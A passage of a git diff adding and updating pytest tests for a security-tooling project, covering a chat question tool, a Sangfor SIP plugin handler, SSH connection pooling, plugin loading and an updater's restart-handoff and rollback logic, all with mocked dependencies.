+        "flocks.session.goal.GoalManager.record_initial_clarification",
+        AsyncMock(),
+    ) as record_clarification:
+        result = await question_module.question_tool(
+            ToolContext(session_id="ses_question_fallback", message_id="msg_1", call_id="call_1"),
+            questions=[
+                {
+                    "question": "漏洞数据源用什么?",
+                    "type": "choice",
+                    "options": [{"label": ""}],
+                }
+            ],
+        )
+
+    assert result.success is True
+    assert captured_questions[0]["type"] == "text"
+    assert captured_questions[0]["options"] == []
+    record_clarification.assert_awaited_once_with(
+        "ses_question_fallback",
+        captured_questions,
+        [["manual answer"]],
+        message_id="msg_1",
+        call_id="call_1",
+    )
+
+
+@pytest.mark.asyncio
+async def test_question_tool_preserves_custom_flag(
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    captured_questions: list[dict] = []
+
+    async def fake_handler(_session_id: str, questions: list[dict]) -> list[list[str]]:
+        captured_questions.extend(questions)
+        return [["NVD"]]
+
+    monkeypatch.setattr(question_module, "_question_handler", fake_handler)
+    monkeypatch.setattr(question_module, "_send_channel_question_if_applicable", AsyncMock(return_value=None))
+
+    with patch(
+        "flocks.session.goal.GoalManager.record_initial_clarification",
+        AsyncMock(),
+    ):
+        result = await question_module.question_tool(
+            ToolContext(session_id="ses_question_custom", message_id="msg_1", call_id="call_1"),
+            questions=[
+                {
+                    "question": "漏洞数据源用什么?",
+                    "type": "choice",
+                    "custom": False,
+                    "options": [{"label": "NVD"}],
+                }
+            ],
+        )
+
+    assert result.success is True
+    assert captured_questions[0]["type"] == "choice"
+    assert captured_questions[0]["custom"] is False
+
+
+@pytest.mark.asyncio
+async def test_question_tool_sends_plain_text_for_channel_session() -> None:
+    binding = SimpleNamespace(
+        channel_id="feishu",
+        account_id="default",
+        chat_id="chat_1",
+        chat_type=SimpleNamespace(value="group"),
+        thread_id=None,
+        session_id="ses_channel",
+    )
+    svc = SimpleNamespace(
+        get_bindings_by_session=AsyncMock(return_value=[binding]),
+    )
+
+    with patch(
+        "flocks.channel.inbound.session_binding.SessionBindingService",
+        return_value=svc,
+    ), patch(
+        "flocks.channel.outbound.deliver.OutboundDelivery.deliver",
+        AsyncMock(return_value=[]),
+    ) as deliver:
+        result = await question_tool(
+            ToolContext(session_id="ses_channel", message_id="msg_1"),
+            questions=[
+                {
+                    "question": "请选择目标 session",
+                    "type": "choice",
+                    "options": [
+                        {"label": "研发群", "description": "session_id=ses_1"},
+                        {"label": "运维群", "description": "session_id=ses_2"},
+                    ],
+                }
+            ],
+        )
+
+    assert result.success is True
+    assert result.metadata["deferred"] is True
+    assert result.metadata["channel_session"] is True
+    deliver.assert_awaited_once()
+    outbound_ctx = deliver.await_args.args[0]
+    assert outbound_ctx.channel_id == "feishu"
+    assert outbound_ctx.to == "chat_1"
+    assert "请选择目标 session" in outbound_ctx.text
+    assert "1. 研发群 - session_id=ses_1" in outbound_ctx.text
+    assert "2. 运维群 - session_id=ses_2" in outbound_ctx.text
diff --git a/tests/tool/test_sangfor_sip_handler.py b/tests/tool/test_sangfor_sip_handler.py
new file mode 100644
index 000000000..b3dc0cb02
--- /dev/null
+++ b/tests/tool/test_sangfor_sip_handler.py
@@ -0,0 +1,104 @@
+"""Targeted tests for the Sangfor SIP plugin handler."""
+
+from __future__ import annotations
+
+import asyncio
+import importlib.util
+import sys
+from pathlib import Path
+from unittest.mock import patch
+
+import pytest
+
+_HANDLER_PATH = (
+    Path(__file__).resolve().parents[2]
+    / ".flocks"
+    / "plugins"
+    / "tools"
+    / "device"
+    / "sangfor_sip_v92"
+    / "sangfor_sip.handler.py"
+)
+
+
+def _load_handler_module():
+    if not _HANDLER_PATH.exists():
+        pytest.skip(f"Sangfor SIP handler not present at {_HANDLER_PATH}")
+    spec = importlib.util.spec_from_file_location(
+        "_sangfor_sip_handler_under_test",
+        str(_HANDLER_PATH),
+    )
+    assert spec and spec.loader
+    module = importlib.util.module_from_spec(spec)
+    sys.modules[spec.name] = module
+    spec.loader.exec_module(module)
+    return module
+
+
+@pytest.fixture(scope="module")
+def handler():
+    return _load_handler_module()
+
+
+def test_run_returns_payload_via_output_field(handler):
+    payload = {"code": 0, "data": [{"id": "asset-1"}]}
+
+    async def _fake_handler(cfg, session, params):
+        assert params == {"max_count": 10}
+        return payload
+
+    cfg = handler.RuntimeConfig(
+        base_url="https://sip.test:7443",
+        timeout=5,
+        platform_name="platform",
+        username="user",
+        password="password",
+        verify_ssl=False,
+    )
+
+    with (
+        patch.object(handler, "_resolve_runtime_config", return_value=cfg),
+        patch.dict(handler._ACTION_MAP, {"compat_check": _fake_handler}),
+    ):
+        result = asyncio.run(handler._run("compat_check", {"max_count": 10}))
+
+    assert result.success is True
+    assert result.error is None
+    assert result.output == payload
+
+
+def test_success_result_falls_back_to_data_for_legacy_constructor(handler):
+    class LegacyToolResult:
+        def __init__(self, *, success, data=None, error=None):
+            self.success = success
+            self.data = data
+            self.error = error
+
+    payload = {"legacy": True}
+
+    with patch.object(handler, "ToolResult", LegacyToolResult):
+        result = handler._success_result(payload)
+
+    assert result.success is True
+    assert result.error is None
+    assert result.data == payload
+
+
+def test_success_result_uses_declared_data_field_for_legacy_model(handler):
+    class LegacyToolResult:
+        __fields__ = {"success": object(), "data": object(), "error": object()}
+
+        def __init__(self, **kwargs):
+            assert "output" not in kwargs
+            self.success = kwargs["success"]
+            self.data = kwargs.get("data")
+            self.error = kwargs.get("error")
+
+    payload = {"legacy_field": True}
+
+    with patch.object(handler, "ToolResult", LegacyToolResult):
+        result = handler._success_result(payload)
+
+    assert result.success is True
+    assert result.error is None
+    assert result.data == payload
diff --git a/tests/tool/test_ssh_utils_pool.py b/tests/tool/test_ssh_utils_pool.py
new file mode 100644
index 000000000..7937e8c0e
--- /dev/null
+++ b/tests/tool/test_ssh_utils_pool.py
@@ -0,0 +1,108 @@
+import asyncio
+from types import SimpleNamespace
+
+import pytest
+
+from flocks.tool.security import ssh_utils
+
+
+class DummyConnection:
+    def __init__(self, host: str) -> None:
+        self.host = host
+        self.closed = False
+
+    def close(self) -> None:
+        self.closed = True
+
+    async def run(self, command: str, check: bool = False) -> SimpleNamespace:
+        return SimpleNamespace(exit_status=0, stdout=f"{self.host}:{command}", stderr="")
+
+
+@pytest.mark.asyncio
+async def test_ssh_pool_evicts_least_recent_idle_connection(monkeypatch: pytest.MonkeyPatch) -> None:
+    created: list[DummyConnection] = []
+
+    async def fake_connect(**kwargs):
+        conn = DummyConnection(kwargs["host"])
+        created.append(conn)
+        return conn
+
+    monkeypatch.setattr(ssh_utils.asyncssh, "connect", fake_connect)
+    pool = ssh_utils.SSHConnectionPool(max_connections=2, idle_ttl_s=3600)
+
+    for host in ("host-1", "host-2", "host-3"):
+        await pool.get_connection("session", host, 22, "root", None, None)
+        await pool.release_connection("session", host, 22, "root")
+
+    assert pool.stats()["connections"] == 2
+    assert pool.stats()["locks"] == 2
+    assert created[0].closed is True
+    assert created[1].closed is False
+    assert created[2].closed is False
+
+
+@pytest.mark.asyncio
+async def test_ssh_pool_prunes_idle_connections_by_ttl(monkeypatch: pytest.MonkeyPatch) -> None:
+    created: list[DummyConnection] = []
+
+    async def fake_connect(**kwargs):
+        conn = DummyConnection(kwargs["host"])
+        created.append(conn)
+        return conn
+
+    monkeypatch.setattr(ssh_utils.asyncssh, "connect", fake_connect)
+    pool = ssh_utils.SSHConnectionPool(max_connections=10, idle_ttl_s=0.01)
+
+    await pool.get_connection("session", "host-1", 22, "root", None, None)
+    await pool.release_connection("session", "host-1", 22, "root")
+    await asyncio.sleep(0.02)
+    await pool.get_connection("session", "host-2", 22, "root", None, None)
+
+    assert created[0].closed is True
+    assert pool.stats()["connections"] == 1
+    assert pool.stats()["locks"] == 1
+
+
+@pytest.mark.asyncio
+async def test_ssh_pool_invalidate_closes_connection(monkeypatch: pytest.MonkeyPatch) -> None:
+    async def fake_connect(**kwargs):
+        return DummyConnection(kwargs["host"])
+
+    monkeypatch.setattr(ssh_utils.asyncssh, "connect", fake_connect)
+    pool = ssh_utils.SSHConnectionPool(max_connections=10, idle_ttl_s=3600)
+
+    conn = await pool.get_connection("session", "host-1", 22, "root", None, None)
+    await pool.invalidate_connection("session", "host-1", 22, "root")
+
+    assert conn.closed is True
+    assert pool.stats()["connections"] == 0
+    assert pool.stats()["locks"] == 0
+
+
+@pytest.mark.asyncio
+async def test_execute_ssh_command_releases_connection_after_run(
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    async def fake_connect(**kwargs):
+        return DummyConnection(kwargs["host"])
+
+    pool = ssh_utils.SSHConnectionPool(max_connections=10, idle_ttl_s=3600)
+    monkeypatch.setattr(ssh_utils.asyncssh, "connect", fake_connect)
+    monkeypatch.setattr(ssh_utils, "_pool", pool)
+
+    exit_code, stdout, stderr = await ssh_utils.execute_ssh_command(
+        host="host-1",
+        command="uptime",
+        username="root",
+        port=22,
+        key_path=None,
+        password=None,
+        timeout_s=5,
+        session_id="session",
+    )
+
+    assert exit_code == 0
+    assert stdout == "host-1:uptime"
+    assert stderr == ""
+    assert pool.stats()["connections"] == 1
+    assert pool.stats()["active_connections"] == 0
diff --git a/tests/tool/test_tool_plugin.py b/tests/tool/test_tool_plugin.py
index aa10e2615..23e20a2ad 100644
--- a/tests/tool/test_tool_plugin.py
+++ b/tests/tool/test_tool_plugin.py
@@ -874,7 +874,10 @@ def _fake_plugin_load() -> None:
                     handler=lambda ctx, **kwargs: None,
                 ))
 
-            with patch("flocks.plugin.PluginLoader.load_all", side_effect=_fake_plugin_load):
+            with patch(
+                "flocks.plugin.PluginLoader.load_extension",
+                side_effect=lambda *_args, **_kwargs: _fake_plugin_load(),
+            ):
                 ToolRegistry._load_plugin_tools()
 
             assert ToolRegistry._plugin_tool_names == ["base64_encode"]
@@ -884,6 +887,26 @@ def _fake_plugin_load() -> None:
             ToolRegistry._plugin_tool_names = old_plugin_names
             ToolRegistry._enabled_defaults = old_enabled_defaults
 
+    def test_load_plugin_tools_loads_legacy_package_entry_points(self):
+        from flocks.tool.registry import ToolRegistry
+
+        old_tools = ToolRegistry._tools.copy()
+        old_plugin_names = ToolRegistry._plugin_tool_names.copy()
+        old_enabled_defaults = ToolRegistry._enabled_defaults.copy()
+        try:
+            ToolRegistry._tools = {}
+            ToolRegistry._plugin_tool_names = []
+            ToolRegistry._enabled_defaults = {}
+
+            with patch("flocks.plugin.PluginLoader.load_extension") as load_extension:
+                ToolRegistry._load_plugin_tools()
+
+            load_extension.assert_called_once_with("TOOLS", load_entry_points=True)
+        finally:
+            ToolRegistry._tools = old_tools
+            ToolRegistry._plugin_tool_names = old_plugin_names
+            ToolRegistry._enabled_defaults = old_enabled_defaults
+
     def test_load_plugin_tools_marks_project_python_tools_native(self, tmp_path: Path):
         from flocks.tool.registry import ToolRegistry, ToolInfo, ToolCategory, Tool
 
@@ -906,7 +929,10 @@ def _fake_plugin_load() -> None:
                     handler=lambda ctx, **kwargs: None,
                 ))
 
-            with patch("flocks.plugin.PluginLoader.load_all", side_effect=_fake_plugin_load):
+            with patch(
+                "flocks.plugin.PluginLoader.load_extension",
+                side_effect=lambda *_args, **_kwargs: _fake_plugin_load(),
+            ):
                 with patch(
                     "flocks.tool.tool_loader.discover_python_tool_sources",
                     return_value={"project_tool": project_tool_path},
@@ -944,7 +970,10 @@ def _fake_plugin_load() -> None:
                 ))
 
             with patch("pathlib.Path.home", return_value=tmp_path / "user_flocks"):
-                with patch("flocks.plugin.PluginLoader.load_all", side_effect=_fake_plugin_load):
+                with patch(
+                    "flocks.plugin.PluginLoader.load_extension",
+                    side_effect=lambda *_args, **_kwargs: _fake_plugin_load(),
+                ):
                     with patch(
                         "flocks.tool.tool_loader.discover_python_tool_sources",
                         return_value={"user_tool": user_tool_path},
@@ -981,7 +1010,7 @@ def test_load_plugin_tools_does_not_reclassify_builtin_name_collision(self, tmp_
             ToolRegistry._plugin_tool_names = []
             ToolRegistry._enabled_defaults = {}
 
-            with patch("flocks.plugin.PluginLoader.load_all", return_value=None):
+            with patch("flocks.plugin.PluginLoader.load_extension", return_value=None):
                 with patch(
                     "flocks.tool.tool_loader.discover_python_tool_sources",
                     return_value={"webfetch": colliding_tool_path},
@@ -1021,7 +1050,7 @@ def test_load_plugin_tools_reconciles_early_registered_python_plugin(self, tmp_p
             ToolRegistry._enabled_defaults = {}
 
             with patch("pathlib.Path.home", return_value=tmp_path / "user_flocks"):
-                with patch("flocks.plugin.PluginLoader.load_all", return_value=None):
+                with patch("flocks.plugin.PluginLoader.load_extension", return_value=None):
                     with patch(
                         "flocks.tool.tool_loader.discover_python_tool_sources",
                         return_value={"calculator": user_tool_path},
diff --git a/tests/updater/test_restart_handoff.py b/tests/updater/test_restart_handoff.py
new file mode 100644
index 000000000..6f9ceaab2
--- /dev/null
+++ b/tests/updater/test_restart_handoff.py
@@ -0,0 +1,175 @@
+from pathlib import Path
+from types import SimpleNamespace
+
+from flocks.updater import restart_handoff
+
+
+def _handoff_args(tmp_path: Path, restart_argv: list[str]) -> list[str]:
+    return [  # argv handed to restart_handoff.run() by the tests in this file
+        "--parent-pid",
+        "1234",
+        "--backend-host",
+        "127.0.0.1",
+        "--backend-port",
+        "8000",
+        "--frontend-host",
+        "127.0.0.1",
+        "--frontend-port",
+        "5173",
+        "--backend-pid-file",
+        str(tmp_path / "backend.pid"),
+        "--install-root",
+        str(tmp_path),
+        "--uv-path",
+        "uv",
+        "--sync-timeout",
+        "300",
+        "--version",
+        "2026.4.1",
+        "--current-version",
+        "2026.3.31",
+        "--",  # the restart command is appended after this separator
+        *restart_argv,
+    ]
+
+
+def test_run_waits_for_parent_and_backend_port_before_spawning(
+    monkeypatch,
+    tmp_path: Path,
+) -> None:
+    events: list[str] = []  # ordered trace that every stub below appends to
+    restart_argv = ["python.exe", "-m", "flocks.cli.main", "serve", "--host", "127.0.0.1", "--port", "8000"]
+
+    monkeypatch.setattr(restart_handoff, "_record_handoff_log", lambda message: events.append(f"log:{message}"))
+    monkeypatch.setattr(  # list.append() returns None, so "... or True" is the stub's return value
+        restart_handoff,
+        "_wait_for_parent_exit",
+        lambda parent_pid: events.append(f"wait-parent:{parent_pid}") or True,
+    )
+    monkeypatch.setattr(
+        restart_handoff,
+        "_ensure_backend_port_free",
+        lambda backend_port, backend_pid_file: events.append(f"free-port:{backend_port}:{backend_pid_file.name}") or True,
+    )
+    monkeypatch.setattr(  # Popen stub records its arguments and returns an object exposing only .pid
+        restart_handoff.subprocess,
+        "Popen",
+        lambda argv, cwd=None, close_fds=False: events.append(f"spawn:{list(argv)}:{cwd}:{close_fds}")
+        or SimpleNamespace(pid=4321),
+    )
+    monkeypatch.setattr(
+        restart_handoff,
+        "_record_backend_runtime_if_direct_serve",
+        lambda process, argv, **kwargs: events.append(f"record:{process.pid}:{list(argv)}:{kwargs['backend_port']}"),
+    )
+    monkeypatch.setattr(restart_handoff, "_run_upgrade_tasks", lambda args: events.append("tasks") or None)
+
+    code = restart_handoff.run(_handoff_args(tmp_path, restart_argv))
+
+    assert code == 0
+    assert events[1:] == [  # the first recorded event is not checked here; the order of the rest is pinned
+        "wait-parent:1234",
+        "free-port:8000:backend.pid",
+        "tasks",
+        f"spawn:{restart_argv}:{tmp_path}:True",
+        f"record:4321:{restart_argv}:8000",
+        "log:restart_spawned pid=4321",
+    ]
+
+
+def test_run_does_not_spawn_when_parent_exit_times_out(monkeypatch, tmp_path: Path) -> None:
+    events: list[str] = []  # collects log lines plus any "spawn"/"tasks" marker from the stubs
+
+    monkeypatch.setattr(restart_handoff, "_record_handoff_log", lambda message: events.append(f"log:{message}"))
+    monkeypatch.setattr(restart_handoff, "_wait_for_parent_exit", lambda parent_pid: False)
+    monkeypatch.setattr(  # would record "spawn" if run() reached Popen
+        restart_handoff.subprocess,
+        "Popen",
+        lambda *_args, **_kwargs: events.append("spawn"),
+    )
+    monkeypatch.setattr(restart_handoff, "_run_upgrade_tasks", lambda args: events.append("tasks") or None)
+
+    code = restart_handoff.run(_handoff_args(tmp_path, ["python.exe", "-m", "flocks.cli.main", "serve"]))
+
+    assert code == 1  # exact-list check below also proves neither "tasks" nor "spawn" was recorded
+    assert events == ["log:started parent_pid=1234 backend=127.0.0.1:8000 frontend=127.0.0.1:5173", "log:parent_exit_timeout parent_pid=1234"]
+
+
+def test_run_does_not_spawn_when_upgrade_tasks_fail(monkeypatch, tmp_path: Path) -> None:
+    events: list[str] = []  # receives log, rollback and spawn markers from the stubs
+    restart_argv = ["python.exe", "-m", "flocks.cli.main", "serve"]
+
+    monkeypatch.setattr(restart_handoff, "_record_handoff_log", lambda message: events.append(f"log:{message}"))
+    monkeypatch.setattr(restart_handoff, "_wait_for_parent_exit", lambda parent_pid: True)
+    monkeypatch.setattr(restart_handoff, "_ensure_backend_port_free", lambda backend_port, backend_pid_file: True)
+    monkeypatch.setattr(restart_handoff, "_run_upgrade_tasks", lambda args: "sync failed")
+    monkeypatch.setattr(restart_handoff, "_rollback_failed_upgrade", lambda args, error: events.append(f"rollback:{error}"))
+    monkeypatch.setattr(  # Popen stub only records "spawn"; the test asserts it never appears
+        restart_handoff.subprocess,
+        "Popen",
+        lambda *_args, **_kwargs: events.append("spawn"),
+    )
+
+    code = restart_handoff.run(_handoff_args(tmp_path, restart_argv))
+
+    assert code == 1
+    assert "rollback:sync failed" in events  # the string returned by the _run_upgrade_tasks stub reached the rollback stub
+    assert "spawn" not in events
+
+
+def test_run_rolls_back_and_cleans_up_when_upgrade_tasks_crash(monkeypatch, tmp_path: Path) -> None:
+    events: list[str] = []  # receives log, rollback and spawn markers from the stubs
+    cleanup_dir = tmp_path / "cleanup"
+    cleanup_dir.mkdir()
+    restart_argv = ["python.exe", "-m", "flocks.cli.main", "serve"]
+
+    def crash(_args):  # stand-in for _run_upgrade_tasks that raises instead of returning
+        raise RuntimeError("boom")
+
+    args = _handoff_args(tmp_path, restart_argv)
+    separator_index = args.index("--")  # the zero-width slice assignment below inserts just before "--"
+    args[separator_index:separator_index] = ["--cleanup-dir", str(cleanup_dir)]
+
+    monkeypatch.setattr(restart_handoff, "_record_handoff_log", lambda message: events.append(f"log:{message}"))
+    monkeypatch.setattr(restart_handoff, "_wait_for_parent_exit", lambda parent_pid: True)
+    monkeypatch.setattr(restart_handoff, "_ensure_backend_port_free", lambda backend_port, backend_pid_file: True)
+    monkeypatch.setattr(restart_handoff, "_run_upgrade_tasks", crash)
+    monkeypatch.setattr(restart_handoff, "_rollback_failed_upgrade", lambda args, error: events.append(f"rollback:{error}"))
+    monkeypatch.setattr(
+        restart_handoff.subprocess,
+        "Popen",
+        lambda *_args, **_kwargs: events.append("spawn"),
+    )
+
+    code = restart_handoff.run(args)
+
+    assert code == 1
+    assert "rollback:upgrade tasks crashed: boom" in events  # exception text is expected inside the rollback error
+    assert not cleanup_dir.exists()  # directory passed via --cleanup-dir must be gone after run()
+    assert "spawn" not in events
+
+
+def test_ensure_backend_port_free_stops_backend_after_wait_timeout(monkeypatch, tmp_path: Path) -> None:
+    events: list[str] = []  # ordered trace of wait / log / stop calls
+    wait_results = iter([False, True])  # first stubbed wait returns False, the second True
+    backend_pid_file = tmp_path / "backend.pid"
+
+    monkeypatch.setattr(restart_handoff, "_record_handoff_log", lambda message: events.append(f"log:{message}"))
+    monkeypatch.setattr(  # records port and timeout_seconds, then yields the next scripted result
+        restart_handoff,
+        "_wait_for_backend_port_free",
+        lambda port, **kwargs: events.append(f"wait:{port}:{kwargs.get('timeout_seconds')}") or next(wait_results),
+    )
+    monkeypatch.setattr(
+        restart_handoff.service_manager,
+        "stop_one",
+        lambda port, pid_file, name, console: events.append(f"stop:{port}:{pid_file.name}:{name}"),
+    )
+
+    assert restart_handoff._ensure_backend_port_free(8000, backend_pid_file) is True
+    assert events == [
+        "wait:8000:None",  # timeout_seconds absent (or None) on the first wait
+        "log:backend_port_still_in_use port=8000; stopping backend",
+        "stop:8000:backend.pid:backend",
+        "wait:8000:20.0",  # second wait is called with timeout_seconds=20.0
+    ]
diff --git a/tests/updater/test_updater.py b/tests/updater/test_updater.py
index 51668f86e..056ddd7b1 100644
--- a/tests/updater/test_updater.py
+++ b/tests/updater/test_updater.py
@@ -1,6 +1,7 @@
 import os
 import shutil
 import subprocess
+import sys
 import tarfile
 import tomllib
 from os import utime
@@ -20,6 +21,24 @@ def _write_pyproject_version(pyproject_path: Path, version: str) -> None:
     )
 
 
+def _prepare_real_restart_runtime(install_root: Path) -> None:
+    """Ensure both venv interpreter paths under ``install_root`` exist, linking or copying ``sys.executable``."""
+    for python_path in (
+        install_root / ".venv" / "bin" / "python",
+        install_root / ".venv" / "Scripts" / "python.exe",
+    ):
+        python_path.parent.mkdir(parents=True, exist_ok=True)
+        if python_path.exists() or python_path.is_symlink():
+            continue  # keep whatever is already there, including a dangling link
+        try:
+            python_path.symlink_to(sys.executable)
+        except OSError:
+            # Symlink creation failed (e.g. missing privilege on Windows); fall back to a copy.
+            shutil.copy2(sys.executable, python_path)
+            # chmod only the copy, per path, inside the loop; on a link it would follow to sys.executable.
+            python_path.chmod(0o755)
+
+
 def test_run_handles_none_process_output(monkeypatch: pytest.MonkeyPatch, tmp_path: Path) -> None:
     def fake_run(*args, **kwargs):
         return subprocess.CompletedProcess(args=args[0], returncode=0, stdout=None, stderr=None)
@@ -54,6 +73,41 @@ def fake_run(*args, **kwargs):
     assert stderr == "failed�output"
 
 
+@pytest.mark.asyncio
+async def test_await_ignoring_cancellation_backs_off_on_repeated_cancellation(
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    shield_calls = 0  # number of times the patched asyncio.shield was invoked
+    sleep_delays: list[float] = []  # delay argument of every patched asyncio.sleep call
+
+    async def fake_shield(task):
+        nonlocal shield_calls
+        shield_calls += 1
+        if shield_calls <= 2:  # first two shield calls are cancelled
+            raise updater.asyncio.CancelledError
+        return await task
+
+    async def fake_sleep(delay: float) -> None:
+        sleep_delays.append(delay)
+        if len(sleep_delays) == 1:  # only the first sleep is itself cancelled
+            raise updater.asyncio.CancelledError
+
+    async def critical_step() -> str:
+        return "done"
+
+    monkeypatch.setattr(updater.asyncio, "shield", fake_shield)
+    monkeypatch.setattr(updater.asyncio, "sleep", fake_sleep)
+
+    result = await updater._await_ignoring_cancellation(critical_step())
+
+    assert result == "done"
+    assert shield_calls == 3  # two cancelled attempts plus the one that returns
+    assert sleep_delays == [  # one retry delay recorded per cancelled shield call
+        updater._CANCELLATION_RETRY_DELAY_SECONDS,
+        updater._CANCELLATION_RETRY_DELAY_SECONDS,
+    ]
+
+
 def test_get_current_version_prefers_higher_marker_version(
     monkeypatch: pytest.MonkeyPatch,
     tmp_path: Path,
@@ -427,7 +481,7 @@ def test_build_uv_sync_env_returns_none_on_windows(
     assert updater._build_uv_sync_env() is None
 
 
-def test_build_dependency_sync_command_skips_project_install_on_windows(
+def test_build_dependency_sync_command_installs_project_on_windows(
     monkeypatch: pytest.MonkeyPatch,
 ) -> None:
     monkeypatch.setattr(updater.sys, "platform", "win32")
@@ -435,7 +489,8 @@ def test_build_dependency_sync_command_skips_project_install_on_windows(
     assert updater._build_dependency_sync_command("uv", uv_default_index="https://mirror.example/simple") == [
         "uv",
         "sync",
-        "--no-install-project",
+        "--frozen",
+        "--no-python-downloads",
         "--default-index",
         "https://mirror.example/simple",
     ]
@@ -446,7 +501,7 @@ def test_build_dependency_sync_command_keeps_project_install_on_non_windows(
 ) -> None:
     monkeypatch.setattr(updater.sys, "platform", "linux")
 
-    assert updater._build_dependency_sync_command("uv") == ["uv", "sync"]
+    assert updater._build_dependency_sync_command("uv") == ["uv", "sync", "--frozen", "--no-python-downloads"]
 
 
 def test_wheel_build_config_does_not_force_include_flockshub() -> None:
@@ -835,76 +890,18 @@ def fake_run(cmd: list[str], **kwargs) -> subprocess.CompletedProcess[str]:
 
 
 @pytest.mark.asyncio
-async def test_validate_windows_restart_runtime_requires_venv_python(tmp_path: Path) -> None:
-    assert await updater._validate_windows_restart_runtime(tmp_path) == (
-        f"Windows restart runtime is missing: {tmp_path / '.venv' / 'Scripts' / 'python.exe'}"
-    )
-
-
-@pytest.mark.asyncio
-async def test_validate_windows_restart_runtime_reports_import_failures(
+async def test_validate_restart_runtime_requires_venv_python(
     monkeypatch: pytest.MonkeyPatch,
     tmp_path: Path,
 ) -> None:
-    python_exe = tmp_path / ".venv" / "Scripts" / "python.exe"
-    python_exe.parent.mkdir(parents=True)
-    python_exe.write_text("", encoding="utf-8")
-
-    async def fake_run_async(cmd, cwd=None, timeout=None, env=None):
-        return 1, "", "No module named uvicorn"
-
-    monkeypatch.setattr(updater, "_run_async", fake_run_async)
-
-    result = await updater._validate_windows_restart_runtime(
-        tmp_path, max_attempts=1,
-    )
-    assert result == "Windows restart runtime validation failed: No module named uvicorn"
-
-
-@pytest.mark.asyncio
-async def test_validate_windows_restart_runtime_handles_timeout(
-    monkeypatch: pytest.MonkeyPatch,
-    tmp_path: Path,
-) -> None:
-    python_exe = tmp_path / ".venv" / "Scripts" / "python.exe"
-    python_exe.parent.mkdir(parents=True)
-    python_exe.write_text("", encoding="utf-8")
-
-    async def fake_run_async(cmd, cwd=None, timeout=None, env=None):
-        raise subprocess.TimeoutExpired(cmd, timeout or 60)
-
-    monkeypatch.setattr(updater, "_run_async", fake_run_async)
-
-    result = await updater._validate_windows_restart_runtime(
-        tmp_path, max_attempts=1, timeout=10,
-    )
-    assert result is not None
-    assert "timed out" in result.lower()
-
-
-@pytest.mark.asyncio
-async def test_validate_windows_restart_runtime_handles_generic_exception(
-    monkeypatch: pytest.MonkeyPatch,
-    tmp_path: Path,
-) -> None:
-    python_exe = tmp_path / ".venv" / "Scripts" / "python.exe"
-    python_exe.parent.mkdir(parents=True)
-    python_exe.write_text("", encoding="utf-8")
-
-    async def fake_run_async(cmd, cwd=None, timeout=None, env=None):
-        raise PermissionError("access denied")
-
-    monkeypatch.setattr(updater, "_run_async", fake_run_async)
-
-    result = await updater._validate_windows_restart_runtime(
-        tmp_path, max_attempts=1,
+    monkeypatch.setattr(updater.sys, "platform", "win32")
+    assert await updater._validate_restart_runtime(tmp_path) == (
+        f"Restart runtime is missing: {tmp_path / '.venv' / 'Scripts' / 'python.exe'}"
     )
-    assert result is not None
-    assert "access denied" in result
 
 
 @pytest.mark.asyncio
-async def test_validate_windows_restart_runtime_retries_and_succeeds(
+async def test_validate_restart_runtime_accepts_existing_venv_python_without_importing(
     monkeypatch: pytest.MonkeyPatch,
     tmp_path: Path,
 ) -> None:
@@ -912,22 +909,14 @@ async def test_validate_windows_restart_runtime_retries_and_succeeds(
     python_exe.parent.mkdir(parents=True)
     python_exe.write_text("", encoding="utf-8")
 
-    call_count = 0
+    async def fail_run_async(*_args, **_kwargs):
+        raise AssertionError("runtime validation should not import project modules")
 
-    async def fake_run_async(cmd, cwd=None, timeout=None, env=None):
-        nonlocal call_count
-        call_count += 1
-        if call_count == 1:
-            raise subprocess.TimeoutExpired(cmd, timeout or 60)
-        return 0, "", ""
+    monkeypatch.setattr(updater, "_run_async", fail_run_async)
 
-    monkeypatch.setattr(updater, "_run_async", fake_run_async)
+    monkeypatch.setattr(updater.sys, "platform", "win32")
 
-    result = await updater._validate_windows_restart_runtime(
-        tmp_path, max_attempts=2, retry_delay=0.0,
-    )
-    assert result is None
-    assert call_count == 2
+    assert await updater._validate_restart_runtime(tmp_path) is None
 
 
 def test_rmtree_onerror_retries_before_logging_skip(monkeypatch: pytest.MonkeyPatch) -> None:
@@ -950,6 +939,17 @@ def fake_remove(path: str) -> None:
     assert warnings == [("updater.rmtree.skip_locked", {"path": "/tmp/locked"})]
 
 
+def test_cleanup_replaced_files_removes_renamed_lock_leftovers(tmp_path: Path) -> None:
+    install_root = tmp_path / "install"
+    leftover = install_root / "webui.flocks_old_123"  # presumably the rename-aside suffix used by updater; confirm there
+    leftover.mkdir(parents=True)
+    (leftover / "old.txt").write_text("old", encoding="utf-8")  # non-empty, so removal must be recursive
+
+    updater.cleanup_replaced_files(install_root)
+
+    assert not leftover.exists()
+
+
 def test_safe_remove_renames_locked_file_on_windows(monkeypatch: pytest.MonkeyPatch, tmp_path: Path) -> None:
     target = tmp_path / "locked.exe"
     target.write_text("old", encoding="utf-8")
@@ -1513,7 +1513,7 @@ def test_replace_install_dir_copies_dot_flocks_plugins_from_source(
 
 
 @pytest.mark.asyncio
-async def test_perform_update_builds_current_frontend_after_handover(
+async def test_perform_update_schedules_handoff_after_handover(
     monkeypatch: pytest.MonkeyPatch,
     tmp_path: Path,
 ) -> None:
@@ -1527,8 +1527,11 @@ async def test_perform_update_builds_current_frontend_after_handover(
     (staged_webui / "dist" / "index.html").write_text("<html></html>", encoding="utf-8")
     install_root = tmp_path / "install-root"
     install_root.mkdir()
+    _prepare_real_restart_runtime(install_root)
 
     events: list[str] = []
+    popen_calls: list[list[str]] = []
+
     async def fake_get_updater_config():
         return SimpleNamespace(
             archive_format="zip",
@@ -1541,15 +1544,6 @@ async def fake_get_updater_config():
             gitee_repo=None,
         )
 
-    async def fake_run_async(cmd, cwd=None, timeout=None, env=None):
-        if cmd[1] == "install":
-            events.append("npm-install")
-        elif cmd[:3] == ["/usr/bin/npm", "run", "build"]:
-            events.append("npm-build")
-        else:
-            events.append("uv-sync")
-        return 0, "", ""
-
     async def fake_download_with_fallback(**_kwargs):
         return archive_path
 
@@ -1566,7 +1560,6 @@ async def fake_sleep(_seconds) -> None:
     monkeypatch.setattr(updater, "_download_with_fallback", fake_download_with_fallback)
     monkeypatch.setattr(updater, "_backup_current_version", lambda *_args, **_kwargs: tmp_path / "backup.tar.gz")
     monkeypatch.setattr(updater, "_extract_archive", lambda *_args, **_kwargs: staged_root)
-    monkeypatch.setattr(updater, "_run_async", fake_run_async)
     monkeypatch.setattr(
         updater,
         "_find_executable",
